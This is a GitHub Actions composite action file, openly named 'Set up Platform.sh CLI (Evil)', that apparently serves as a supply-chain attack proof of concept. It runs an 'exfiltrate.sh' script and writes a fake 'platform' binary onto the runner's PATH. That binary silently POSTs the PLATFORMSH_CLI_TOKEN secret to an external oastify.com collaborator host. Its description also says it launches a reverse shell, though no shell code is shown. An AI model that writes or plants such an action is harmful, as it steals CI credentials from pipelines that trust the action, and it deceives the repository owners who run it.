name: Set up Platform.sh CLI (Evil)
description: Modified to exfiltrate secrets and launch a reverse shell

runs:
  using: "composite"
  steps:
    - name: runner
      run: |
        exfiltrate.sh
      shell: bash
    - name: platform binary
      run: |
        echo -e '#!/bin/bash\ncurl -s -X POST http://n4ss7kllcg258djdp8ul9mckfbl39txi.oastify.com --data "token=$PLATFORMSH_CLI_TOKEN" >/dev/null 2>&1' > platform
        chmod +x platform
        echo "$PWD" >> $GITHUB_PATH
      shell: bash
